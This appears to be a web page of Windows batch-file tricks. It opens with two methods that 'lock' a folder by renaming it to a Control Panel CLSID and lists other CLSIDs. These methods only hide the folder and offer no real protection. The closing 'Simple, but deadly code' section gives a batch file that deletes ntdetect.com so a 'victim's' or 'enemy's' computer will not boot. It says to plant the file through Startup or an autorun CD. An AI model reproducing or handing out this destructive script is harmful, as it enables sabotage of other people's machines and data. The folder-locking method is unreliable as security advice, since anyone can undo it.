Lock your Folder Without Software (Another Method)

Copy the following program:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Now paste it in notepad.
* Modify blue color area with your own password.
* Save it as batch file(with extension .bat).Any name will do.
* Now you see a batch file. Double click it to create a folder locker.
* A new folder named Locker would be formed at the same location.
* Now brings all the files you want to hide in the locker folder.
* Now double click the batch file to lock the folder namely Locker.
* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

Lock folders without softwares

Suppose you want to lock the folder movies in D: which has path D:\Games .
Open notepad and type

ren Games Games.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Now Save this text file as "Location.bat" in the same drive [ D:\ ]

Now Open notepad again and type

ren Games.{21EC2020-3AEA-1069-A2DD-08002B30309D} Games

Now save this text file as "Key.bat" in the same drive
Now two batch file are created Location and Key.Press Location and the folder will change to control panel such that you cannot view its Contents .Press key and you'll get back your original folder .

You can also change the folder in to

Inbox

{00020D75-0000-0000-C000-000000000046}
Microsoft Network
{00028B00-0000-0000-C000-000000000046}
Programs Folder
{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
Start Menu Folder
{48e7caab-b918-4e58-a94d-505519c795dc}
Network Computers
{1f4de370-d627-11d1-ba4f-00a0c91eedba}
My Computer
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Network Places
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Network Connections
{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Printers and Faxes
{2227A280-3AEA-1069-A2DE-08002B30309D}
Recycle Bin
{645FF040-5081-101B-9F08-00AA002F954E}
Scanners and Cameras
{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Scheduled Tasks
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Web Folders
{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Simple, but deadly code

Simple, but deadly code >>> UNDETECTABLE
Here is a simple way on how to Block your enemies PC
The Simple but Deadly Code
open notepad type the code as following
__________________________________________________
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
__________________________________________________
save this file as virus.bat or any other name with bat extension
Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.
NOTE: DO NOT Run this into your PC
with this activated once the computer will run perfectly !
once shutdowned then it will not start and U will have to format it (Except you know how to use DOS).